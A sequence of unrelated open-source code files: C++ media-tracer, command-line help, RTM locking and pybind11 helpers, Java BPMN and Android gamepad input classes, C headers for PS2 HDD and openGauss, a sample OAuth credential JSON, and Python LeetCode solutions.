out_num, syncp); std::string elapsed = TimeToString(t.GetTime()); if (syncp) { sp.syncPoint = (*syncp); } else { sp.syncPoint = NULL; } 
Log::WriteLog(">> MFXVideoUSER_ProcessFrameAsync called"); Log::WriteLog(context.dump("session", session)); Log::WriteLog(context.dump_mfxHDL("in", in)); Log::WriteLog(context.dump_mfxU32("in_num", in_num)); Log::WriteLog(context.dump_mfxHDL("out", out)); Log::WriteLog(context.dump_mfxU32("out_num", out_num)); Log::WriteLog(context.dump("syncp", sp.syncPoint)); Log::WriteLog("function: MFXVideoUSER_ProcessFrameAsync(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } else // call without logging { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*) session; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxFunctionPointer proc = loader->table[eMFXVideoUSER_ProcessFrameAsync_tracer]; if (!proc) return MFX_ERR_INVALID_HANDLE; session = loader->session; mfxStatus status = (*(fMFXVideoUSER_ProcessFrameAsync) proc) (session, in, in_num, out, out_num, syncp); return status; } } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus MFXVideoUSER_GetPlugin(mfxSession session, mfxU32 type, mfxPlugin *par) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; Log::WriteLog("function: MFXVideoUSER_GetPlugin(mfxSession session=" + ToString(session) + ", mfxU32 type=" + ToString(type) + ", mfxPlugin *par=" + ToString(par) + ") +"); mfxLoader *loader = (mfxLoader*) session; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxFunctionPointer proc = loader->table[eMFXVideoUSER_GetPlugin_tracer]; if (!proc) return MFX_ERR_INVALID_HANDLE; session = loader->session; Log::WriteLog(context.dump("session", session)); Log::WriteLog(context.dump_mfxU32("type", type)); if (par) Log::WriteLog(context.dump("par", *par)); Timer t; mfxStatus status = (*(fMFXVideoUSER_GetPlugin) proc)(session, type, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> MFXVideoUSER_GetPlugin called"); Log::WriteLog(context.dump("session", session)); Log::WriteLog(context.dump_mfxU32("type", type)); if (par) Log::WriteLog(context.dump("par", *par)); Log::WriteLog("function: MFXVideoUSER_GetPlugin(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus MFXAudioUSER_Register(mfxSession session, mfxU32 type, const mfxPlugin *par) { (void)session; (void)type; (void)par; return MFX_ERR_NONE; } mfxStatus MFXAudioUSER_Unregister(mfxSession session, mfxU32 type) { (void)session; (void)type; return MFX_ERR_NONE; }
28,452
493
/* ========================= eCAL LICENSE ================================= * * Copyright (C) 2016 - 2019 Continental Corporation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * ========================= eCAL LICENSE ================================= */ #include <custom_tclap/advanced_tclap_output.h> #include <sstream> namespace CustomTclap { AdvancedTclapOutput::AdvancedTclapOutput(const std::vector<std::ostream*>& output_streams, int max_width) : output_streams_(output_streams) , max_width_(max_width) {} AdvancedTclapOutput::AdvancedTclapOutput(std::ostream* output_stream, int max_width) : AdvancedTclapOutput(std::vector<std::ostream*>{output_stream}, max_width) {} void AdvancedTclapOutput::version(TCLAP::CmdLineInterface &cmd) { std::string progName = cmd.getProgramName(); std::string xversion = cmd.getVersion(); std::stringstream ss; // Create string ss << std::endl << progName << " version: " << xversion << std::endl << std::endl; // publish string to all output streams for (std::ostream* output_stream : output_streams_) { (*output_stream) << ss.str(); } } void AdvancedTclapOutput::usage(TCLAP::CmdLineInterface &cmd) { std::stringstream ss; // Create string ss << std::endl << "USAGE: " << std::endl << std::endl; shortUsage(cmd, ss); ss << std::endl << std::endl << "Where: " << std::endl << std::endl; longUsage(cmd, ss); ss << std::endl; // publish string to all output streams for (std::ostream* output_stream : output_streams_) { (*output_stream) << ss.str(); } } void AdvancedTclapOutput::failure(TCLAP::CmdLineInterface &cmd, TCLAP::ArgException &e) { std::stringstream ss; // Create string std::string progName = cmd.getProgramName(); ss << "PARSE ERROR: " << e.argId() << std::endl << " " << e.error() << std::endl << std::endl; if (cmd.hasHelpAndVersion()) { ss << "Brief USAGE: " << std::endl; shortUsage(cmd, ss); ss << std::endl << "For complete USAGE and HELP type: " << std::endl << " " << progName << " --help" << std::endl << std::endl; } else { usage(cmd); } // publish string to all output streams for (std::ostream* output_stream : output_streams_) { (*output_stream) << ss.str(); } //throw TCLAP::ExitException(1); } void AdvancedTclapOutput::setArgumentHidden(TCLAP::Arg* argument, bool hidden) { if (hidden) hidden_arguments_.emplace(argument); else hidden_arguments_.erase(argument); } void AdvancedTclapOutput::shortUsage(TCLAP::CmdLineInterface& cmd, std::ostream& os) const { std::list<TCLAP::Arg*> arg_list = cmd.getArgList(); std::string prog_name = cmd.getProgramName(); TCLAP::XorHandler xor_handler = cmd.getXorHandler(); std::vector<std::vector<TCLAP::Arg*>> xor_list = xor_handler.getXorList(); std::string s = prog_name + " "; // first the xor xor_list = createXorListWithoutHiddenArgs(xor_list); for (int i = 0; static_cast<size_t>(i) < xor_list.size(); i++) { s += " {"; for (TCLAP::ArgVectorIterator it = xor_list[i].begin(); it != xor_list[i].end(); ++it) { s += (*it)->shortID() + "|"; } s[s.length() - 1] = '}'; } // then the rest for (TCLAP::ArgListIterator it = arg_list.begin(); it != 
arg_list.end(); ++it) { if (!xor_handler.contains((*it)) && (hidden_arguments_.find(*it) == hidden_arguments_.end())) { s += " " + (*it)->shortID(); } } // if the program name is too long, then adjust the second line offset int second_line_offset = static_cast<int>(prog_name.length()) + 2; if (second_line_offset > max_width_ / 3) { second_line_offset = static_cast<int>(max_width_ / 3); } spacePrint(os, s, max_width_, 3, second_line_offset); } void AdvancedTclapOutput::longUsage(TCLAP::CmdLineInterface& cmd, std::ostream& os) const { std::list<TCLAP::Arg*> arg_list = cmd.getArgList(); std::string message = cmd.getMessage(); TCLAP::XorHandler xor_handler = cmd.getXorHandler(); std::vector<std::vector<TCLAP::Arg*>> xor_list = xor_handler.getXorList(); xor_list = createXorListWithoutHiddenArgs(xor_list); // first the xor for (int i = 0; static_cast<unsigned int>(i) < xor_list.size(); i++) { for (TCLAP::ArgVectorIterator it = xor_list[i].begin(); it != xor_list[i].end(); ++it) { spacePrint(os, (*it)->longID(), max_width_, 3, 3); spacePrint(os, (*it)->getDescription(), max_width_, 5, 0); if (it + 1 != xor_list[i].end()) spacePrint(os, "-- OR --", max_width_, 9, 0); } os << std::endl << std::endl; } // then the rest for (TCLAP::ArgListIterator it = arg_list.begin(); it != arg_list.end(); ++it) { if (!xor_handler.contains((*it)) && (hidden_arguments_.find(*it) == hidden_arguments_.end())) { spacePrint(os, (*it)->longID(), max_width_, 3, 3); spacePrint(os, (*it)->getDescription(), max_width_, 5, 0); os << std::endl; } } os << std::endl; spacePrint(os, message, max_width_, 3, 0); } std::vector<std::vector<TCLAP::Arg*>> AdvancedTclapOutput::createXorListWithoutHiddenArgs(const std::vector<std::vector<TCLAP::Arg*>>& xor_list) const { std::vector<std::vector<TCLAP::Arg*>> cleaned_xor_list; // Remove hidden arguments from XOR list for (size_t i = 0; i < xor_list.size(); i++) { std::vector<TCLAP::Arg*> arg_list; for (size_t j = 0; j < xor_list[i].size(); j++) { if (hidden_arguments_.find(xor_list[i][j]) == hidden_arguments_.end()) { arg_list.push_back(xor_list[i][j]); } } if (!arg_list.empty()) { cleaned_xor_list.push_back(std::move(arg_list)); } } return cleaned_xor_list; } }
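A hedged usage sketch for the AdvancedTclapOutput class above: it is registered on a TCLAP::CmdLine with setOutput() so that help, version, and parse errors go through the custom streams, and setArgumentHidden() keeps an internal switch out of the usage text. The TCLAP calls shown (CmdLine, SwitchArg, add, setOutput, parse) are standard TCLAP API, but the argument names and the 80-column width are made up for illustration.

// Hedged usage sketch for the AdvancedTclapOutput class above (assumes TCLAP is available).
#include <custom_tclap/advanced_tclap_output.h>
#include <tclap/CmdLine.h>
#include <iostream>
#include <vector>

int main(int argc, char** argv) {
    try {
        TCLAP::CmdLine cmd("example tool", ' ', "1.0");

        TCLAP::SwitchArg verbose_arg("v", "verbose", "Enable verbose output", false);
        TCLAP::SwitchArg internal_arg("", "internal-debug", "Internal switch", false);
        cmd.add(verbose_arg);
        cmd.add(internal_arg);

        // Route --help / --version / parse errors to stdout, wrapped at 80 columns,
        // and keep the internal switch out of the printed usage text.
        CustomTclap::AdvancedTclapOutput output(std::vector<std::ostream*>{&std::cout}, 80);
        output.setArgumentHidden(&internal_arg, true);
        cmd.setOutput(&output);

        cmd.parse(argc, argv);
        if (verbose_arg.getValue()) std::cout << "verbose mode\n";
    } catch (TCLAP::ArgException& e) {
        std::cerr << "error: " << e.error() << " for arg " << e.argId() << std::endl;
        return 1;
    }
    return 0;
}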
2,795
5,250
/* Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.flowable.bpmn.model; import java.util.ArrayList; import java.util.List; public class DataAssociation extends BaseElement { protected String sourceRef; protected String targetRef; protected String transformation; protected List<Assignment> assignments = new ArrayList<>(); public String getSourceRef() { return sourceRef; } public void setSourceRef(String sourceRef) { this.sourceRef = sourceRef; } public String getTargetRef() { return targetRef; } public void setTargetRef(String targetRef) { this.targetRef = targetRef; } public String getTransformation() { return transformation; } public void setTransformation(String transformation) { this.transformation = transformation; } public List<Assignment> getAssignments() { return assignments; } public void setAssignments(List<Assignment> assignments) { this.assignments = assignments; } @Override public DataAssociation clone() { DataAssociation clone = new DataAssociation(); clone.setValues(this); return clone; } public void setValues(DataAssociation otherAssociation) { setSourceRef(otherAssociation.getSourceRef()); setTargetRef(otherAssociation.getTargetRef()); setTransformation(otherAssociation.getTransformation()); assignments = new ArrayList<>(); if (otherAssociation.getAssignments() != null && !otherAssociation.getAssignments().isEmpty()) { for (Assignment assignment : otherAssociation.getAssignments()) { assignments.add(assignment.clone()); } } } }
767
3,212
{ "client_id": "123456789012-af23m23321knfg00ekrjlwke90rjkewl.apps.googleusercontent.com", "client_secret": "<KEY>", "refresh_token": "1/cvZBer532GBbzsxdf7jj7LOvd-IcmbSa5tgVcls5j5z", "type": "authorized_user" }
106
606
<reponame>AKuHAK/ps2sdk<gh_stars>100-1000 /* # _____ ___ ____ ___ ____ # ____| | ____| | | |____| # | ___| |____ ___| ____| | \ PS2DEV Open Source Project. #----------------------------------------------------------------------- # Copyright 2001-2004, ps2dev - http://www.ps2dev.org # Licenced under Academic Free License version 2.0 # Review ps2sdk README & LICENSE files for further details. */ /** * @file * HDD library functions */ #ifndef __LIBHDD_H__ #define __LIBHDD_H__ #include <tamtypes.h> #include <hdd-ioctl.h> #include <libpwroff.h> #define PFS_MT_ROBUST 0x02 #define FS_COMMON_PREFIX '+' #define FS_GROUP_SYSTEM 0x00 #define FS_GROUP_COMMON 0x01 #define FS_GROUP_APPLICATION 0x02 #define FS_TYPE_EXT2 0x0083 #define FS_TYPE_EXT2_SWAP 0x0082 #define FS_TYPE_PFS 0x0100 #define FS_TYPE_EMPTY 0x0000 #define ATTR_MAIN_PARTITION 0x0000 #define ATTR_SUB_PARTITION 0x0001 typedef struct { /** Filesystem name */ char name[32]; /** Filename which can be used with fXioMount */ char filename[40]; /** Total filesystem size, in mega-bytes */ u32 size; /** 1 if filesystem is formatted, 0 otherwise */ int formatted; /** Reported free space, in mega-bytes */ u32 freeSpace; /** Filesystem group (either system, common or application) */ int fileSystemGroup; } t_hddFilesystem; typedef struct { /** Total size of the HDD in mega-bytes */ u32 hddSize; /** Free space on the HDD in mega-bytes */ u32 hddFree; /** The maximum size allowed for a single partition, in mega-bytes */ u32 hddMaxPartitionSize; } t_hddInfo; #ifdef __cplusplus extern "C" { #endif int hddCheckPresent(); int hddCheckFormatted(); int hddFormat(); int hddGetFilesystemList(t_hddFilesystem hddFs[], int maxEntries); void hddGetInfo(t_hddInfo *info); int hddMakeFilesystem(int fsSizeMB, char *name, int type); int hddRemoveFilesystem(t_hddFilesystem *fs); int hddExpandFilesystem(t_hddFilesystem *fs, int extraMB); #ifdef __cplusplus } #endif // These hdd* functions are deprecated // Use the poweroff* version instead #define hddPreparePoweroff poweroffInit #define hddSetUserPoweroffCallback poweroffSetCallback #define hddPowerOff poweroffShutdown #endif /* __LIBHDD_H__ */
855
651
<reponame>abhisek-kundu/libxsmm /****************************************************************************** * Copyright (c) Intel Corporation - All rights reserved. * * This file is part of the LIBXSMM library. * * * * For information on the license, see the LICENSE file. * * Further information: https://github.com/hfp/libxsmm/ * * SPDX-License-Identifier: BSD-3-Clause * ******************************************************************************/ /* <NAME> (Intel Corp.) ******************************************************************************/ #include <immintrin.h> #include <iostream> #include <stdio.h> #ifdef RTM_DEBUG extern int rtm_stats[1000][16]; #endif #define ATTEMPTS 0 #define ABORTS 1 #define LOCKS 2 #define COUNTS 3 #define ABORTS_RETRY 4 #define ABORTS_NORETRY 5 #define ABORTS_TIMEOUT 6 #define ABORTS_EXPLICIT 7 #define ABORTS_ZERO 8 inline void clear_rtm_stats() { #ifdef RTM_DEBUG int rtm_max_threads = omp_get_max_threads(); for (int i = 0; i < rtm_max_threads; i++) { for (int j = 0; j < 16; j++) { rtm_stats[i][j] = 0; } } #endif } inline void print_rtm_stats() { #ifdef RTM_DEBUG int rtm_max_threads = omp_get_max_threads(); int total[16] = {0}; for (int i = 0; i < rtm_max_threads; i++) { printf("Tid %3d: RTM_STATS C: %8d AT: %8d AB: %8d L: %6d (E: %6d Z: %6d R: %6d O: %6d T: %6d)\n", i, rtm_stats[i][COUNTS], rtm_stats[i][ATTEMPTS], rtm_stats[i][ABORTS], rtm_stats[i][LOCKS], rtm_stats[i][ABORTS_EXPLICIT], rtm_stats[i][ABORTS_ZERO], rtm_stats[i][ABORTS_RETRY], rtm_stats[i][ABORTS_NORETRY], rtm_stats[i][ABORTS_TIMEOUT]); total[COUNTS] += rtm_stats[i][COUNTS]; total[ATTEMPTS] += rtm_stats[i][ATTEMPTS]; total[ABORTS] += rtm_stats[i][ABORTS]; total[LOCKS] += rtm_stats[i][LOCKS]; total[ABORTS_EXPLICIT] += rtm_stats[i][ABORTS_EXPLICIT]; total[ABORTS_ZERO] += rtm_stats[i][ABORTS_ZERO]; total[ABORTS_RETRY] += rtm_stats[i][ABORTS_RETRY]; total[ABORTS_NORETRY] += rtm_stats[i][ABORTS_NORETRY]; total[ABORTS_TIMEOUT] += rtm_stats[i][ABORTS_TIMEOUT]; } printf("Total: RTM_STATS C: %8d AT: %8d AB: %8d L: %6d (E: %6d Z: %6d R: %6d O: %6d T: %6d)\n", total[COUNTS], total[ATTEMPTS], total[ABORTS], total[LOCKS], total[ABORTS_EXPLICIT], total[ABORTS_ZERO], total[ABORTS_RETRY], total[ABORTS_NORETRY], total[ABORTS_TIMEOUT]); #endif } class SimpleSpinLock { volatile unsigned int state; enum { Free = 0, Busy = 1 }; public: SimpleSpinLock() : state(Free) {} void lock() { while (__sync_val_compare_and_swap(&state, Free, Busy) != Free) { do { _mm_pause(); } while (state == Busy); } } void unlock() { state = Free; } bool isLocked() const { return state == Busy; } }; #ifdef RTM_DEBUG #define INC_RTM_DEBUG_COUNT(tid, x) rtm_stats[tid][x]++ #else #define INC_RTM_DEBUG_COUNT(tid, x) #endif class TransactionScope { SimpleSpinLock &fallBackLock; TransactionScope(); /* forbidden */ public: TransactionScope(SimpleSpinLock &fallBackLock_, int max_retries = 10, int tid = 0) : fallBackLock(fallBackLock_) { int nretries = 0; INC_RTM_DEBUG_COUNT(tid, COUNTS); while (1) { ++nretries; INC_RTM_DEBUG_COUNT(tid, ATTEMPTS); unsigned status = _xbegin(); if (status == _XBEGIN_STARTED) { if (!fallBackLock.isLocked()) return; /* successfully started transaction */ _xabort(0xff); /* abort with code 0xff */ } /* abort handler */ INC_RTM_DEBUG_COUNT(tid, ABORTS); /* handle _xabort(0xff) from above */ if ((status & _XABORT_EXPLICIT) && _XABORT_CODE(status) == 0xff && !(status & _XABORT_NESTED)) { while (fallBackLock.isLocked()) _mm_pause(); /* wait until lock is free */ INC_RTM_DEBUG_COUNT(tid, ABORTS_EXPLICIT); } else if 
(status == 0) { INC_RTM_DEBUG_COUNT(tid, ABORTS_ZERO); } else if ((status & _XABORT_RETRY) || (status & _XABORT_CONFLICT)) { INC_RTM_DEBUG_COUNT(tid, ABORTS_RETRY); } else { INC_RTM_DEBUG_COUNT(tid, ABORTS_NORETRY); /*break;*/ /* take the fall-back lock if the retry abort flag is not set*/ } if (nretries >= max_retries) { INC_RTM_DEBUG_COUNT(tid, ABORTS_TIMEOUT); break; /* too many retries, take the fall-back lock*/ } } fallBackLock.lock(); INC_RTM_DEBUG_COUNT(tid, LOCKS); } ~TransactionScope() { if (fallBackLock.isLocked()) { fallBackLock.unlock(); } else { _xend(); } } }; #undef INC_RTM_DEBUG_COUNT
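A hedged usage sketch for SimpleSpinLock and TransactionScope from the file above: several OpenMP threads bump a shared counter, each increment wrapped in a TransactionScope that starts an RTM transaction and falls back to the spin lock after the retry budget is exhausted. The include path and iteration counts are made up; RTM-capable hardware is assumed.

// Hedged usage sketch for the SimpleSpinLock / TransactionScope classes above.
// Assumes a CPU with RTM support; the header name below is hypothetical.
#include <omp.h>
#include <cstdio>
// #include "rtm_lock.h"   // wherever SimpleSpinLock / TransactionScope are declared

static SimpleSpinLock g_fallback_lock;
static long g_counter = 0;

void increment_many(int iterations) {
    int tid = omp_get_thread_num();
    for (int i = 0; i < iterations; ++i) {
        // Constructor begins an RTM transaction, or takes the spin lock after
        // max_retries aborts; the destructor commits or releases accordingly.
        TransactionScope guard(g_fallback_lock, /*max_retries=*/10, tid);
        ++g_counter;
    }
}

int main() {
    clear_rtm_stats();
    #pragma omp parallel
    increment_many(100000);
    print_rtm_stats();   // prints per-thread abort/lock statistics when RTM_DEBUG is set
    std::printf("counter = %ld\n", g_counter);
    return 0;
}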
2,299
2,535
#pragma once #include <pybind11/numpy.h> #include <pybind11/pybind11.h> #include <iostream> #include <vector> #include "opencv2/core/core.hpp" namespace py = pybind11; namespace foundation { typedef py::array_t<float, py::array::c_style | py::array::forcecast> pyarray_f; typedef py::array_t<double, py::array::c_style | py::array::forcecast> pyarray_d; typedef py::array_t<int, py::array::c_style | py::array::forcecast> pyarray_int; typedef py::array_t<unsigned char, py::array::c_style | py::array::forcecast> pyarray_uint8; template <typename T> py::array_t<T> py_array_from_data(const T *data, size_t shape0) { py::array_t<T> res(shape0); std::copy(data, data + shape0, res.mutable_data()); return res; } template <typename T> py::array_t<T> py_array_from_data(const T *data, size_t shape0, size_t shape1) { py::array_t<T> res({shape0, shape1}); std::copy(data, data + shape0 * shape1, res.mutable_data()); return res; } template <typename T> py::array_t<T> py_array_from_data(const T *data, size_t shape0, size_t shape1, size_t shape2) { py::array_t<T> res({shape0, shape1, shape2}); std::copy(data, data + shape0 * shape1 * shape2, res.mutable_data()); return res; } template <typename T> py::array_t<T> py_array_from_vector(const std::vector<T> &v) { const T *data = v.size() ? &v[0] : NULL; return py_array_from_data(data, v.size()); } template <typename T> py::array_t<T> py_array_from_cvmat(const cv::Mat &m) { const T *data = m.rows ? m.ptr<T>(0) : NULL; return py_array_from_data(data, m.rows, m.cols); } template <typename T> cv::Mat pyarray_cv_mat_view_typed(T &array, int type) { int height = 1; int width = 1; if (array.ndim() == 1) { width = array.shape(0); } else if (array.ndim() == 2) { height = array.shape(0); width = array.shape(1); } return cv::Mat(height, width, type, array.mutable_data()); } cv::Mat pyarray_cv_mat_view(pyarray_f &array); cv::Mat pyarray_cv_mat_view(pyarray_d &array); cv::Mat pyarray_cv_mat_view(pyarray_int &array); cv::Mat pyarray_cv_mat_view(pyarray_uint8 &array); } // namespace foundation
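A hedged usage sketch for the pybind11/OpenCV helpers declared above: one binding builds a NumPy array from a std::vector via py_array_from_vector, another views an incoming float array as a cv::Mat with pyarray_cv_mat_view and scales it in place. The module name, function names, and header path are made up for illustration.

// Hedged usage sketch for the pybind11/OpenCV helpers declared above.
// Module name, function names, and the include path are hypothetical.
#include <pybind11/pybind11.h>
#include <vector>
#include "foundation/python_types.h"   // hypothetical path to the header above

namespace py = pybind11;

// Return a 1-D NumPy array built from a C++ vector (copies the data).
py::array_t<double> make_ramp(int n) {
    std::vector<double> values(n);
    for (int i = 0; i < n; ++i) values[i] = 0.5 * i;
    return foundation::py_array_from_vector(values);
}

// View an incoming float array as a cv::Mat (no copy) and scale it in place.
void scale_in_place(foundation::pyarray_f& array, float factor) {
    cv::Mat view = foundation::pyarray_cv_mat_view(array);
    view *= factor;
}

PYBIND11_MODULE(example_foundation, m) {
    m.def("make_ramp", &make_ramp, "Build a ramp of n doubles as a NumPy array");
    m.def("scale_in_place", &scale_in_place, "Scale a float array in place via cv::Mat");
}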
911
360
<filename>src/include/vecexecutor/vecnestloop.h /* * Copyright (c) 2020 Huawei Technologies Co.,Ltd. * * openGauss is licensed under Mulan PSL v2. * You can use this software according to the terms and conditions of the Mulan PSL v2. * You may obtain a copy of Mulan PSL v2 at: * * http://license.coscl.org.cn/MulanPSL2 * * THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, * EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, * MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE. * See the Mulan PSL v2 for more details. * --------------------------------------------------------------------------------------- * * vecnestloop.h * * * IDENTIFICATION * src/include/vecexecutor/vecnestloop.h * * --------------------------------------------------------------------------------------- */ #ifndef VECNESTLOOP_H #define VECNESTLOOP_H #include "vecexecutor/vecnodes.h" extern VectorBatch* ExecVecNestloop(VecNestLoopState* node); extern VecNestLoopState* ExecInitVecNestLoop(VecNestLoop* node, EState* estate, int eflags); extern void ExecEndVecNestLoop(VecNestLoopState* node); extern void ExecReScanVecNestLoop(VecNestLoopState* node); #define NL_NEEDNEWOUTER 1 #define NL_NEEDNEXTOUTROW 2 #define NL_EXECQUAL 3 #define NL_END 4 class VecNestLoopRuntime : public BaseObject { public: VecNestLoopRuntime(VecNestLoopState* runtime); template <bool ifReturnNotFull> VectorBatch* JoinT(); void Rescan(); /* To avoid Coverity Warning: missing_user_dtor */ virtual ~VecNestLoopRuntime(); private: template <bool ifTargetlistNull> void FetchOuterT(); void NextOuterRow(); void OutJoinBatchAlignInnerJoinBatch(int rows); template <JoinType type, bool doProject, bool hasJoinQual, bool hasOtherQual> VectorBatch* JoinQualT(); template <JoinType type> void InitT(List* joinqual, List* otherqual, ProjectionInfo* projInfo); void BindingFp(); VectorBatch* (VecNestLoopRuntime::*WrapperBatch)(VectorBatch* batch); VectorBatch* (VecNestLoopRuntime::*JoinOnQual)(); void (VecNestLoopRuntime::*FetchOuter)(); private: VecNestLoopState* m_runtime; // runtime status // int m_status; // a batch with 1 null row, for left/anti join // VectorBatch* m_innerNullBatch; // outer batch // VectorBatch* m_outerBatch; // 1 row from outer batch, but we set for a batch max size // VectorBatch* m_outJoinBatch; int m_outReadIdx; JoinType m_joinType; bool m_matched; VectorBatch* m_currentBatch; VectorBatch* m_bckBatch; int m_bufferRows; bool m_SimpletargetCol; bool m_outerTargetIsNull; int m_outJoinBatchRows; }; #endif
1,013
854
<gh_stars>100-1000 __________________________________________________________________________________________________ sample 116 ms submission class Solution: def minFallingPathSum(self, A): n = len(A) tmp = [ A[0][::] for i in range(2)] for i in range(1, n): for j in range(n): t1 = tmp[(i-1)%2] m = t1[j] if j > 0 and m > t1[j-1]: m = t1[j-1] if j < n-1 and m > t1[j+1]: m = t1[j+1] tmp[i%2][j] = A[i][j] + m return min(tmp[(n-1)%2]) __________________________________________________________________________________________________ sample 13532 kb submission class Solution: def minFallingPathSum(self, A: List[List[int]]) -> int: change = [0]* len(A) for row in A: new_change = [1e10]*len(row) for i in range(len(A[0])): for delta in [-1, 0, 1]: if i+delta >= 0 and i+delta < len(row): new_change[i] = min(new_change[i], change[i+delta]+row[i]) change = new_change return min(change) __________________________________________________________________________________________________
611
3,058
package de.johanneskuhlmann.gainput; import android.content.Context; import android.hardware.input.InputManager; import android.view.InputDevice; import android.view.KeyEvent; import android.view.MotionEvent; import java.util.HashMap; import java.util.Map; public class Gainput implements InputManager.InputDeviceListener { // Must have same order/values as the respective enum in GainputInputDevicePad.h enum PadButton { PadButtonLeftStickX, PadButtonLeftStickY, PadButtonRightStickX, PadButtonRightStickY, PadButtonAxis4, // L2/Left trigger PadButtonAxis5, // R2/Right trigger PadButtonAxis6, PadButtonAxis7, PadButtonAxis8, PadButtonAxis9, PadButtonAxis10, PadButtonAxis11, PadButtonAxis12, PadButtonAxis13, PadButtonAxis14, PadButtonAxis15, PadButtonAxis16, PadButtonAxis17, PadButtonAxis18, PadButtonAxis19, PadButtonAxis20, PadButtonAxis21, PadButtonAxis22, PadButtonAxis23, PadButtonAxis24, PadButtonAxis25, PadButtonAxis26, PadButtonAxis27, PadButtonAxis28, PadButtonAxis29, PadButtonAxis30, PadButtonAxis31, PadButtonAccelerationX, PadButtonAccelerationY, PadButtonAccelerationZ, PadButtonGravityX, PadButtonGravityY, PadButtonGravityZ, PadButtonGyroscopeX, PadButtonGyroscopeY, PadButtonGyroscopeZ, PadButtonMagneticFieldX, PadButtonMagneticFieldY, PadButtonMagneticFieldZ, PadButtonStart, PadButtonSelect, PadButtonLeft, PadButtonRight, PadButtonUp, PadButtonDown, PadButtonA, // Cross PadButtonB, // Circle PadButtonX, // Square PadButtonY, // Triangle PadButtonL1, PadButtonR1, PadButtonL2, PadButtonR2, PadButtonL3, // Left thumb PadButtonR3, // Right thumb PadButtonHome, // PS button PadButton17, PadButton18, PadButton19, PadButton20, PadButton21, PadButton22, PadButton23, PadButton24, PadButton25, PadButton26, PadButton27, PadButton28, PadButton29, PadButton30, PadButton31, PadButtonMax_ } // Must have same order/values as the respective enum in GainputInputDevice.h enum DeviceType { DT_MOUSE, ///< A mouse/cursor input device featuring one pointer. DT_KEYBOARD, ///< A keyboard input device. DT_PAD, ///< A joypad/gamepad input device. DT_TOUCH, ///< A touch-sensitive input device supporting multiple simultaneous pointers. DT_BUILTIN, ///< Any controls directly built into the device that also contains the screen. DT_REMOTE, ///< A generic networked input device. DT_GESTURE, ///< A gesture input device, building on top of other input devices. DT_CUSTOM, ///< A custom, user-created input device. DT_COUNT ///< The count of input device types. 
} public static native void nativeOnInputBool(int deviceType, int deviceIndex, int buttonId, boolean value); public static native void nativeOnInputFloat(int deviceType, int deviceIndex, int buttonId, float value); public static native void nativeOnDeviceChanged(int deviceId, boolean available); public float viewWidth = 1.0f; public float viewHeight = 1.0f; private float getRealX(float x) { return (x/viewWidth); } private float getRealY(float y) { return (y/viewHeight); } public Gainput(Context context) { inputManager_ = (InputManager) context.getSystemService(Context.INPUT_SERVICE); if (inputManager_ != null) { inputManager_.registerInputDeviceListener(this, null); } int[] deviceIds = InputDevice.getDeviceIds(); for (int deviceId : deviceIds) { InputDevice dev = InputDevice.getDevice(deviceId); int sources = dev.getSources(); if (((sources & InputDevice.SOURCE_GAMEPAD) == InputDevice.SOURCE_GAMEPAD) || ((sources & InputDevice.SOURCE_JOYSTICK) == InputDevice.SOURCE_JOYSTICK)) { onInputDeviceAdded(deviceId); } } } @Override protected void finalize() { if (inputManager_ != null) { inputManager_.unregisterInputDeviceListener(this); } } private final InputManager inputManager_; private Map<Integer, Integer> deviceIdMappings_ = new HashMap<Integer, Integer>(); private int translateDeviceIdToIndex(int deviceId) { Integer index = deviceIdMappings_.get(deviceId); if (index != null) { return index; } // Find the lowest non-used index. for (int i = 0; i < 1000; ++i) { if (!deviceIdMappings_.containsValue(i)) { deviceIdMappings_.put(deviceId, i); return i; } } return 0; } @Override public void onInputDeviceAdded(int deviceId) { nativeOnDeviceChanged(translateDeviceIdToIndex(deviceId), true); } @Override public void onInputDeviceChanged(int deviceId) { } @Override public void onInputDeviceRemoved(int deviceId) { int oldDeviceId = translateDeviceIdToIndex(deviceId); deviceIdMappings_.remove(deviceId); nativeOnDeviceChanged(oldDeviceId, false); } private void handleAxis(int deviceId, PadButton button, float value) { boolean isButton = false; if (button == PadButton.PadButtonLeft || button == PadButton.PadButtonUp) { if (value < -0.5f) value = -1.0f; else value = 0.0f; isButton = true; } else if (button == PadButton.PadButtonRight || button == PadButton.PadButtonDown) { if (value > 0.5f) value = 1.0f; else value = 0.0f; isButton = true; } if (isButton) { nativeOnInputBool(DeviceType.DT_PAD.ordinal(), deviceId, button.ordinal(), value != 0.0f); } else { nativeOnInputFloat(DeviceType.DT_PAD.ordinal(), deviceId, button.ordinal(), value); } } public boolean handleMotionEvent(MotionEvent event) { int source = event.getSource(); if ((source & InputDevice.SOURCE_JOYSTICK) == InputDevice.SOURCE_JOYSTICK || (source & InputDevice.SOURCE_GAMEPAD) == InputDevice.SOURCE_GAMEPAD) { int deviceId = translateDeviceIdToIndex(event.getDeviceId()); handleAxis(deviceId, PadButton.PadButtonLeftStickX, event.getAxisValue(MotionEvent.AXIS_X)); handleAxis(deviceId, PadButton.PadButtonLeftStickY, 